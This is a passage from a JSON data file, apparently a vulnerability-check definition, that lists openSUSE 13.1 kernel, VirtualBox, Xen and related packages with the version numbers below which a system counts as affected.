"4.2.18_k3.11.10_25-2.21.1", "arch": "i586", "packageFilename": "virtualbox-guest-kmp-desktop-4.2.18_k3.11.10_25-2.21.1.i586.rpm", "packageName": "virtualbox-guest-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-debug-debugsource-3.11.10-25.1.i686.rpm", "packageName": "kernel-debug-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.3_k3.11.10_25-2.16.1", "arch": "i586", "packageFilename": "xtables-addons-kmp-pae-debuginfo-2.3_k3.11.10_25-2.16.1.i586.rpm", "packageName": "xtables-addons-kmp-pae-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "20130607-2.17.1", "arch": "i586", "packageFilename": "vhba-kmp-debugsource-20130607-2.17.1.i586.rpm", "packageName": "vhba-kmp-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.28_k3.11.10_25-16.16.1", "arch": "x86_64", "packageFilename": "hdjmod-kmp-default-1.28_k3.11.10_25-16.16.1.x86_64.rpm", "packageName": "hdjmod-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-pae-devel-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-pae-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2_k3.11.10_25-2.16.1", "arch": "i586", "packageFilename": "crash-kmp-desktop-debuginfo-7.0.2_k3.11.10_25-2.16.1.i586.rpm", "packageName": "crash-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-vanilla-devel-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-vanilla-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1-2.20.1", "arch": "i586", "packageFilename": "ipset-debuginfo-6.21.1-2.20.1.i586.rpm", "packageName": "ipset-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-pae-base-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-pae-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.58_k3.11.10_25-16.1", "arch": "x86_64", "packageFilename": "ndiswrapper-kmp-desktop-debuginfo-1.58_k3.11.10_25-16.1.x86_64.rpm", "packageName": "ndiswrapper-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-trace-debugsource-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-trace-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-default-base-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2-2.16.1", "arch": "x86_64", "packageFilename": "crash-gcore-debuginfo-7.0.2-2.16.1.x86_64.rpm", "packageName": "crash-gcore-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2-2.16.1", "arch": "i586", "packageFilename": "crash-gcore-7.0.2-2.16.1.i586.rpm", "packageName": "crash-gcore", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-ec2-base-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-ec2-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02-30.1", "arch": "x86_64", "packageFilename": "xen-doc-html-4.3.2_02-30.1.x86_64.rpm", "packageName": "xen-doc-html", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1-2.20.1", "arch": "x86_64", "packageFilename": "ipset-debuginfo-6.21.1-2.20.1.x86_64.rpm", "packageName": "ipset-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-default-devel-debuginfo-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-default-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.4.20.3-13.16.1", "arch": "i586", "packageFilename": "iscsitarget-debugsource-1.4.20.3-13.16.1.i586.rpm", "packageName": "iscsitarget-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.28-16.16.1", "arch": "x86_64", "packageFilename": "hdjmod-debugsource-1.28-16.16.1.x86_64.rpm", "packageName": "hdjmod-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-pae-3.11.10-25.1.i686.rpm", "packageName": "kernel-pae", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-debug-debuginfo-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-host-kmp-default-4.2.18_k3.11.10_25-2.21.1.x86_64.rpm", "packageName": "virtualbox-host-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-desktop-base-3.11.10-25.1.i686.rpm", "packageName": "kernel-desktop-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.3_k3.11.10_25-2.16.1", "arch": "i586", "packageFilename": "xtables-addons-kmp-default-2.3_k3.11.10_25-2.16.1.i586.rpm", "packageName": "xtables-addons-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-debug-base-debuginfo-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-debug-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02_k3.11.10_25-30.1", "arch": "i586", "packageFilename": "xen-kmp-pae-debuginfo-4.3.2_02_k3.11.10_25-30.1.i586.rpm", "packageName": "xen-kmp-pae-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.58-16.1", "arch": "i586", "packageFilename": "ndiswrapper-1.58-16.1.i586.rpm", "packageName": "ndiswrapper", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.28-16.16.1", "arch": "i586", "packageFilename": "hdjmod-debugsource-1.28-16.16.1.i586.rpm", "packageName": "hdjmod-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.4.20.3_k3.11.10_25-13.16.1", "arch": "i586", "packageFilename": "iscsitarget-kmp-default-debuginfo-1.4.20.3_k3.11.10_25-13.16.1.i586.rpm", "packageName": "iscsitarget-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-debug-base-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-debug-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02-30.1", "arch": "i586", "packageFilename": "xen-debugsource-4.3.2_02-30.1.i586.rpm", "packageName": "xen-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-desktop-3.11.10-25.1.i686.rpm", "packageName": "kernel-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "20130607_k3.11.10_25-2.17.1", "arch": "x86_64", "packageFilename": "vhba-kmp-default-20130607_k3.11.10_25-2.17.1.x86_64.rpm", "packageName": "vhba-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.58_k3.11.10_25-16.1", "arch": "i586", "packageFilename": "ndiswrapper-kmp-desktop-1.58_k3.11.10_25-16.1.i586.rpm", "packageName": "ndiswrapper-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2_k3.11.10_25-2.16.1", "arch": "x86_64", "packageFilename": "crash-kmp-default-debuginfo-7.0.2_k3.11.10_25-2.16.1.x86_64.rpm", "packageName": "crash-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-trace-devel-debuginfo-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-trace-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2-2.16.1", "arch": "x86_64", "packageFilename": "crash-eppic-7.0.2-2.16.1.x86_64.rpm", "packageName": "crash-eppic", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-pae-base-3.11.10-25.1.i686.rpm", "packageName": "kernel-pae-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "0.44_k3.11.10_25-258.16.1", "arch": "i586", "packageFilename": "pcfclock-kmp-desktop-0.44_k3.11.10_25-258.16.1.i586.rpm", "packageName": "pcfclock-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02_k3.11.10_25-30.1", "arch": "i586", "packageFilename": "xen-kmp-desktop-debuginfo-4.3.2_02_k3.11.10_25-30.1.i586.rpm", "packageName": "xen-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "20130607_k3.11.10_25-2.17.1", "arch": "i586", "packageFilename": "vhba-kmp-xen-debuginfo-20130607_k3.11.10_25-2.17.1.i586.rpm", "packageName": "vhba-kmp-xen-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2_k3.11.10_25-2.16.1", "arch": "i586", "packageFilename": "crash-kmp-xen-debuginfo-7.0.2_k3.11.10_25-2.16.1.i586.rpm", "packageName": "crash-kmp-xen-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2_k3.11.10_25-2.16.1", "arch": "x86_64", "packageFilename": "crash-kmp-xen-7.0.2_k3.11.10_25-2.16.1.x86_64.rpm", "packageName": "crash-kmp-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1-2.20.1", "arch": "x86_64", "packageFilename": "libipset3-6.21.1-2.20.1.x86_64.rpm", "packageName": "libipset3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "i586", "packageFilename": "virtualbox-websrv-debuginfo-4.2.18-2.21.1.i586.rpm", "packageName": "virtualbox-websrv-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-debuginfo-4.2.18-2.21.1.x86_64.rpm", "packageName": "virtualbox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-guest-x11-4.2.18-2.21.1.x86_64.rpm", "packageName": "virtualbox-guest-x11", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02-30.1", "arch": "x86_64", "packageFilename": "xen-tools-domU-4.3.2_02-30.1.x86_64.rpm", "packageName": "xen-tools-domU", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "0.44_k3.11.10_25-258.16.1", "arch": "x86_64", "packageFilename": "pcfclock-kmp-desktop-debuginfo-0.44_k3.11.10_25-258.16.1.x86_64.rpm", "packageName": "pcfclock-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-guest-x11-debuginfo-4.2.18-2.21.1.x86_64.rpm", "packageName": "virtualbox-guest-x11-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "20130607_k3.11.10_25-2.17.1", "arch": "i586", "packageFilename": "vhba-kmp-pae-debuginfo-20130607_k3.11.10_25-2.17.1.i586.rpm", "packageName": "vhba-kmp-pae-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-default-base-debuginfo-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-default-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-vanilla-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-vanilla-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "noarch", "packageFilename": "kernel-devel-3.11.10-25.1.noarch.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "0.44-258.16.1", "arch": "x86_64", "packageFilename": "pcfclock-0.44-258.16.1.x86_64.rpm", "packageName": "pcfclock", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2-2.16.1", "arch": "i586", "packageFilename": "crash-debuginfo-7.0.2-2.16.1.i586.rpm", "packageName": "crash-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.28_k3.11.10_25-16.16.1", "arch": "x86_64", "packageFilename": "hdjmod-kmp-desktop-1.28_k3.11.10_25-16.16.1.x86_64.rpm", "packageName": "hdjmod-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "i586", "packageFilename": "virtualbox-host-kmp-desktop-4.2.18_k3.11.10_25-2.21.1.i586.rpm", "packageName": "virtualbox-host-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.3_k3.11.10_25-2.16.1", "arch": "x86_64", "packageFilename": "xtables-addons-kmp-xen-2.3_k3.11.10_25-2.16.1.x86_64.rpm", "packageName": "xtables-addons-kmp-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2_k3.11.10_25-2.16.1", "arch": "i586", "packageFilename": "crash-kmp-desktop-7.0.2_k3.11.10_25-2.16.1.i586.rpm", "packageName": "crash-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "i586", "packageFilename": "virtualbox-host-kmp-pae-debuginfo-4.2.18_k3.11.10_25-2.21.1.i586.rpm", "packageName": "virtualbox-host-kmp-pae-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-4.2.18-2.21.1.x86_64.rpm", "packageName": "virtualbox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.4.20.3-13.16.1", "arch": "i586", "packageFilename": "iscsitarget-1.4.20.3-13.16.1.i586.rpm", "packageName": "iscsitarget", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-desktop-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-ec2-devel-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-ec2-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02-30.1", "arch": "x86_64", "packageFilename": "xen-xend-tools-4.3.2_02-30.1.x86_64.rpm", "packageName": "xen-xend-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-default-debuginfo-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1-2.20.1", "arch": "i586", "packageFilename": "libipset3-6.21.1-2.20.1.i586.rpm", "packageName": "libipset3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.28_k3.11.10_25-16.16.1", "arch": "i586", "packageFilename": "hdjmod-kmp-xen-debuginfo-1.28_k3.11.10_25-16.16.1.i586.rpm", "packageName": "hdjmod-kmp-xen-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-desktop-debugsource-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-desktop-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02_k3.11.10_25-30.1", "arch": "x86_64", "packageFilename": "xen-kmp-default-debuginfo-4.3.2_02_k3.11.10_25-30.1.x86_64.rpm", "packageName": "xen-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1_k3.11.10_25-2.20.1", "arch": "i586", "packageFilename": "ipset-kmp-xen-6.21.1_k3.11.10_25-2.20.1.i586.rpm", "packageName": "ipset-kmp-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.3_k3.11.10_25-2.16.1", "arch": "x86_64", "packageFilename": "xtables-addons-kmp-desktop-debuginfo-2.3_k3.11.10_25-2.16.1.x86_64.rpm", "packageName": "xtables-addons-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "i586", "packageFilename": "virtualbox-debugsource-4.2.18-2.21.1.i586.rpm", "packageName": "virtualbox-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2_k3.11.10_25-2.16.1", "arch": "x86_64", "packageFilename": "crash-kmp-desktop-debuginfo-7.0.2_k3.11.10_25-2.16.1.x86_64.rpm", "packageName": "crash-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1_k3.11.10_25-2.20.1", "arch": "i586", "packageFilename": "ipset-kmp-xen-debuginfo-6.21.1_k3.11.10_25-2.20.1.i586.rpm", "packageName": "ipset-kmp-xen-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "i586", "packageFilename": "virtualbox-guest-kmp-desktop-debuginfo-4.2.18_k3.11.10_25-2.21.1.i586.rpm", "packageName": "virtualbox-guest-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02-30.1", "arch": "x86_64", "packageFilename": "xen-libs-32bit-4.3.2_02-30.1.x86_64.rpm", "packageName": "xen-libs-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.28_k3.11.10_25-16.16.1", "arch": "x86_64", "packageFilename": "hdjmod-kmp-default-debuginfo-1.28_k3.11.10_25-16.16.1.x86_64.rpm", "packageName": "hdjmod-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "20130607_k3.11.10_25-2.17.1", "arch": "i586", "packageFilename": "vhba-kmp-desktop-debuginfo-20130607_k3.11.10_25-2.17.1.i586.rpm", "packageName": "vhba-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "0.44-258.16.1", "arch": "x86_64", "packageFilename": "pcfclock-debugsource-0.44-258.16.1.x86_64.rpm", "packageName": "pcfclock-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "20130607_k3.11.10_25-2.17.1", "arch": "i586", "packageFilename": "vhba-kmp-default-debuginfo-20130607_k3.11.10_25-2.17.1.i586.rpm", "packageName": "vhba-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-guest-kmp-default-debuginfo-4.2.18_k3.11.10_25-2.21.1.x86_64.rpm", "packageName": "virtualbox-guest-kmp-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "i586", "packageFilename": "virtualbox-host-kmp-pae-4.2.18_k3.11.10_25-2.21.1.i586.rpm", "packageName": "virtualbox-host-kmp-pae", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.4.20.3_k3.11.10_25-13.16.1", "arch": "i586", "packageFilename": "iscsitarget-kmp-xen-1.4.20.3_k3.11.10_25-13.16.1.i586.rpm", "packageName": "iscsitarget-kmp-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.639_k3.11.10_25-11.16.1", "arch": "i586", "packageFilename": "cloop-kmp-pae-2.639_k3.11.10_25-11.16.1.i586.rpm", "packageName": "cloop-kmp-pae", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-ec2-base-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-ec2-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "i586", "packageFilename": "python-virtualbox-4.2.18-2.21.1.i586.rpm", "packageName": "python-virtualbox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-ec2-debuginfo-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-ec2-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.58-16.1", "arch": "i586", "packageFilename": "ndiswrapper-debuginfo-1.58-16.1.i586.rpm", "packageName": "ndiswrapper-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "20130607_k3.11.10_25-2.17.1", "arch": "x86_64", "packageFilename": "vhba-kmp-xen-20130607_k3.11.10_25-2.17.1.x86_64.rpm", "packageName": "vhba-kmp-xen", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-default-debugsource-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2_k3.11.10_25-2.16.1", "arch": "x86_64", "packageFilename": "crash-kmp-desktop-7.0.2_k3.11.10_25-2.16.1.x86_64.rpm", "packageName": "crash-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.4.20.3_k3.11.10_25-13.16.1", "arch": "x86_64", "packageFilename": "iscsitarget-kmp-default-1.4.20.3_k3.11.10_25-13.16.1.x86_64.rpm", "packageName": "iscsitarget-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-xen-base-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-xen-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "20130607-2.17.1", "arch": "x86_64", "packageFilename": "vhba-kmp-debugsource-20130607-2.17.1.x86_64.rpm", "packageName": "vhba-kmp-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-devel-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-vanilla-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2-2.16.1", "arch": "x86_64", "packageFilename": "crash-eppic-debuginfo-7.0.2-2.16.1.x86_64.rpm", "packageName": "crash-eppic-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1_k3.11.10_25-2.20.1", "arch": "i586", "packageFilename": "ipset-kmp-pae-6.21.1_k3.11.10_25-2.20.1.i586.rpm", "packageName": "ipset-kmp-pae", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.58-16.1", "arch": "x86_64", "packageFilename": "ndiswrapper-1.58-16.1.x86_64.rpm", "packageName": "ndiswrapper", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02_k3.11.10_25-30.1", "arch": "i586", "packageFilename": "xen-kmp-default-4.3.2_02_k3.11.10_25-30.1.i586.rpm", "packageName": "xen-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.58_k3.11.10_25-16.1", "arch": "i586", "packageFilename": "ndiswrapper-kmp-pae-1.58_k3.11.10_25-16.1.i586.rpm", "packageName": "ndiswrapper-kmp-pae", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-devel-debuginfo-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-vanilla-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "x86_64", "packageFilename": "python-virtualbox-4.2.18-2.21.1.x86_64.rpm", "packageName": "python-virtualbox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "i686", "packageFilename": "kernel-pae-debuginfo-3.11.10-25.1.i686.rpm", "packageName": "kernel-pae-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2-2.16.1", "arch": "i586", "packageFilename": "crash-eppic-debuginfo-7.0.2-2.16.1.i586.rpm", "packageName": "crash-eppic-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "2.3_k3.11.10_25-2.16.1", "arch": "i586", "packageFilename": "xtables-addons-kmp-pae-2.3_k3.11.10_25-2.16.1.i586.rpm", "packageName": "xtables-addons-kmp-pae", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1_k3.11.10_25-2.20.1", "arch": "i586", "packageFilename": "ipset-kmp-default-6.21.1_k3.11.10_25-2.20.1.i586.rpm", "packageName": "ipset-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "6.21.1_k3.11.10_25-2.20.1", "arch": "x86_64", "packageFilename": "ipset-kmp-desktop-debuginfo-6.21.1_k3.11.10_25-2.20.1.x86_64.rpm", "packageName": "ipset-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "0.44_k3.11.10_25-258.16.1", "arch": "x86_64", "packageFilename": "pcfclock-kmp-desktop-0.44_k3.11.10_25-258.16.1.x86_64.rpm", "packageName": "pcfclock-kmp-desktop", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "7.0.2-2.16.1", "arch": "i586", "packageFilename": "crash-eppic-7.0.2-2.16.1.i586.rpm", "packageName": "crash-eppic", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18_k3.11.10_25-2.21.1", "arch": "i586", "packageFilename": "virtualbox-host-kmp-desktop-debuginfo-4.2.18_k3.11.10_25-2.21.1.i586.rpm", "packageName": "virtualbox-host-kmp-desktop-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.2.18-2.21.1", "arch": "x86_64", "packageFilename": "virtualbox-debugsource-4.2.18-2.21.1.x86_64.rpm", "packageName": "virtualbox-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "3.11.10-25.1", "arch": "x86_64", "packageFilename": "kernel-xen-debuginfo-3.11.10-25.1.x86_64.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "4.3.2_02_k3.11.10_25-30.1", "arch": "i586", "packageFilename": "xen-kmp-default-debuginfo-4.3.2_02_k3.11.10_25-30.1.i586.rpm", "packageName": "xen-kmp-default-debuginfo", "operator": 